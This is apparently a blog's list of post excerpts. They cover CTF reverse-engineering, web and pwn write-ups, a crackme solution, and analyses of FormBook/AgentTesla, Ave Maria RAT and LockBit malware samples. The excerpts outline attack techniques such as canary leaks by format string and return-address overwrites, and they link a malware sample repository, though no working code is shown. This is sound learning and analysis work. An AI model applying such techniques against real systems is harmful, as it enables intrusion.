Author: Chan Jin Hao
-
Angstrom Rev Writeups
I’ve decided to fully focus on Rev and Web for CTFs now, as I find Pwning too magical, and not really “useful” to me. Anyhoo, here are some reversing writeups from Angstrom CTF! Dyn Running the code, we see that it gets the flag as an input Stepping through the code, it tries to unwrap 32 characters, […]
-
247CTF
Here are some writeups for 247CTF, which are mostly web challenges. ACID We’re given a page that has two accounts. You can transfer funds between the two accounts with the parameter ?to=1&from=2&amount=1 To get the flag, you require more than the total available funds at the start, which is 247. If we transfer the funds […]
-
Midnight Sun CTF Gambler
This is one of the hardest CTF I’ve been in. My team did really well to qualify for the finals in Sweden, and I wish them all the best as I will not be joining them. The Gambler This was a DotNet binary, we so could use DNSpy to inspect the full source code In […]
-
Winja CTF Reverse Engineering
Honestly, this was a very easy CTF rev challenge. One of them had a flaw with there being more than 1 possible flag, while another was straight out leaking the whole flag with ltrace. So this is the only writeup worth writing, even though it was extremely easy Matriarcado Opening the binary, we see that […]
-
WolvSec CTF: pwning canaries
Another writeup for a pwn CTF challenge! In this challenge, we need to leak the canary value via format strings, and do a buffer overflow to change the return address to the desired function. The buffer for us to overflow is 16 characters long. It first reads in data with a format string, and prints […]
-
WolvSec CTF
I briefly participated in a CTF hosted by WolvSec here: https://ctf.wolvseccon.org/. This post is going to be looking at a “Medium” level difficulty Reverse Engineering problem! n33dl3 When we run the file, it prints a single statement, before terminating Firing this binary in Ghidra, we see a deep level of nested function calls, however, they […]
-
RE: Crackme Guess the Password
https://crackmes.one/crackme/60906d5833c5d458ce0ec80b I’ve been doing plenty of crackmes as a way to improve my RE skills, although I do stay away from Keygen challenges as I don’t find them particularly interesting. Instead, I’m attempting those that require you to key in a right username or password. This write up is about a pretty interesting and challenging […]
-
FormBook / AgentTesla
Today we’re gonna look at a sample of FormBook Malware, which contains AgentTesla within it. It features things such as hiding an EXE within an EXE, and installing a persistent backdoor within the system. Source: https://bazaar.abuse.ch/sample/35147128936c2e79548e5c0a2bbd70cd5a29c1b01dfa1ac2515fa5becb7efa6d/#intel First DNSpy Analysis When we run the exe file through DNSpy, it looks to be building a simple form. […]
-
Ave Maria RAT (Loader?)
The sample we’re analyzing is part of the Ave Maria RAT malware family, but judging from it’s simple functions, perhaps it’s simply a loader to download the more complete malware. The file disguises itself as a PDF file with the icon, but in actuality, it’s a .NET program. We fire up DNSpy and load it […]
-
RE Series #10: LockBit ELF
After doing a substantial amount of RE challenges, I decided to analyze real Malware to see if what I’ve learnt is actually useful, and I have to say, I think it really helped! In this post, I’ll be dissecting the initial portions of the Linux variant of LockBit. Basic Information The binary on its own […]